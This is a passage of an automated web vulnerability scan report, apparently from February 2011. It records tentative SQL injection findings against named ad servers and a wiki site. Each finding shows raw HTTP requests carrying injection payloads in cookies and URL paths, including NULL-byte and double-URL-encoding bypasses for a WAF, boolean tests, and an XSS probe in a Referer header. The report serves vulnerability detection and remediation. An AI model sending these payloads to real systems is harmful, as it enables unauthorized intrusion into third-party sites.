Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; srh=1%3Aq64FAA%3D%3D; b=%3A%3A12z9b%2C12z9q; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d3702bc-839e-0690-5370-3c19a9561295:0:712156:20822400:6ch47d7o8wtv:0:712181:20838240::0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; ut=1%3Abc5LEoMgEATQu8zahZNPQbwNfkoQBIRUSHC8uyUukkW2r3q6Z4XXBZoV9PBJLvQRGujkxOTbWU04Xw1vCamuOin5uNS9KshywTmJ20KoI%2BMPuhMyd%2BZ8NpbQmDHk77HPk%2FmDSvw2eptCPHefB0AFrbB2CKq8Btu2Aw%3D%3D; fq=858in%2C1uo0%7Clg5g0e%2C85n7h%2C1uo0%7Clg5fqp%7Clg5g3u%2C7egfy%2C1uo0%7Clg5fjw; vsd="0@1@4d4d64ca@www.veoh.com"

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html;charset=utf-8
Content-Length: 1000
Date: Sat, 05 Feb 2011 16:31:47 GMT
Connection: close

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /v0/ad?sid=1397994&zs=3732385f3930%00''&ifr=2&ref=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; srh=1%3Aq64FAA%3D%3D; b=%3A%3A12z9b%2C12z9q; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d3702bc-839e-0690-5370-3c19a9561295:0:712156:20822400:6ch47d7o8wtv:0:712181:20838240::0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; ut=1%3Abc5LEoMgEATQu8zahZNPQbwNfkoQBIRUSHC8uyUukkW2r3q6Z4XXBZoV9PBJLvQRGujkxOTbWU04Xw1vCamuOin5uNS9KshywTmJ20KoI%2BMPuhMyd%2BZ8NpbQmDHk77HPk%2FmDSvw2eptCPHefB0AFrbB2CKq8Btu2Aw%3D%3D; fq=858in%2C1uo0%7Clg5g0e%2C85n7h%2C1uo0%7Clg5fqp%7Clg5g3u%2C7egfy%2C1uo0%7Clg5fjw; vsd="0@1@4d4d64ca@www.veoh.com"

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: b=%3A%3Atyp6%2C12z9b%2C12z9q; Domain=.adbrite.com; Expires=Sun, 05-Feb-2012 16:31:47 GMT; Path=/
Set-Cookie: ut=1%3ATY5bDoMgFAX3cr%2F98PYRqLvBRwRBQGikxevem2KT%2BjuZyTkbrBdoNtDDO7nQR2igkxOTL2c14Xw1vCWkuuqk5ONS96pAlguck7gthDoy%2FqA7IXOH57OxhMaMIf9jn5U4xz84mbPpbQrx2H1%2BAVTQCmuHoMo12PcP; Domain=.adbrite.com; Expires=Tue, 02-Feb-2021 16:31:47 GMT; Path=/
Set-Cookie: fq=7ss52%2C1uo0%7Clg5kkz%2C858in%2C1uo0%7Clg5g0e%2C85n7h%2C1uo0%7Clg5fqp%7Clg5g3u%2C7egfy%2C1uo0%7Clg5fjw; Domain=.adbrite.com; Expires=Sun, 05-Feb-2012 16:31:47 GMT; Path=/
Set-Cookie: vsd="0@1@4d4d7b73@htcwiki.wetpaint.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Type: application/x-javascript
Date: Sat, 05 Feb 2011 16:31:47 GMT
Connection: close
Content-Length: 2781

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <div width='1' height='1' style='visibility:hidden; overflow:hidden'><img style='margin-left:-10px; margin-top
...[SNIP]...

1.2. http://adserver.adtechus.com/addyn/3.0/5242.1/1200349/0/225/ADTECH [autotrdr_exclude cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200349/0/225/ADTECH

Issue detail

The autotrdr_exclude cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the autotrdr_exclude cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the autotrdr_exclude cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude%2527

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18937

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_1201431(i) {
var sVersion_1201431 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5242.1/1200349/0/225/ADTECH;alias=InformationWeek_Software_HP_Top_728x90;key=225700573b6576 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude%2527%2527

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1051

document.write("<iframe src=\"http://view.atdmt.com/00A/iview/285954478/direct/01/922966745?click=http://adserver.adtechus.com/adlink/5242/1201431/0/225/AdId=1347635;BnId=1;itime=922966745;key=2257005
...[SNIP]...

1.3. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00'; autotrdr_exclude=autotrdr_exclude;

Response 1 (redirected)

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18756

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_1200449(i) {
var sVersion_1200449 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E%00''; autotrdr_exclude=autotrdr_exclude;

Response 2 (redirected)

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 828

document.write("<scr"+"ipt src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2122901&PluID=0&w=728&h=90&ncu=$$http://adserver.adtechus.com/adlink/5242/1200449/0/225/AdId=1385484
...[SNIP]...

1.4. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5242.1/1200449/0/225/ADTECH

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00' HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18756

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_1200449(i) {
var sVersion_1200449 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5242.1/1200449/0/225/ADTECH%00'' HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude;

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 994

document.write("<iframe src=\"http://view.atdmt.com/DWO/iview/256850674/direct/01/923001577?click=http://adserver.adtechus.com/adlink/5242/1200449/0/225/AdId=1364757;BnId=1;itime=923001577;nodecode=ye
...[SNIP]...

1.5. http://htcwiki.wetpaint.com/page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically [WPC-action cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically

Issue detail

The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:31 GMT
Server: Apache
Set-Cookie: wab=joinButton=38; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:31 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPo6SRuabbqp; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=FC676FF8175FB9189B56FD2C05DD08B6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:31 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>

   <meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone W
...[SNIP]...

Request 2

GET /page/After+Format+skip+the+Tap+to+set+up+windows+mobile+programatically HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:32 GMT
Server: Apache
Set-Cookie: wab=joinButton=82; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:32 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcGTetEI1fA+k; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:32 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 37629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>After Format skip the Tap to set up windows mobile programatically - HTC Smartphone Wiki</title>

   <meta name="description" content="After Format skip the Tap to set up windows mobile programatically because my touch screen not working. i have been using the mobile for a year now with now touch..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"
...[SNIP]...

1.6. http://htcwiki.wetpaint.com/page/HTC+BLUE+ANGEL [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/HTC+BLUE+ANGEL

Issue detail

The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:26 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4H880Qv8zfr+; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=D81A586ADE0621AAB28668E041DF5C6E; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:26 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Blue Angel - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Sm
...[SNIP]...

Request 2

GET /page/HTC+BLUE+ANGEL HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:28 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1SW7KYlyOAb4BEEDqu1Zw35; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:28 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 57728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Blue Angel - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
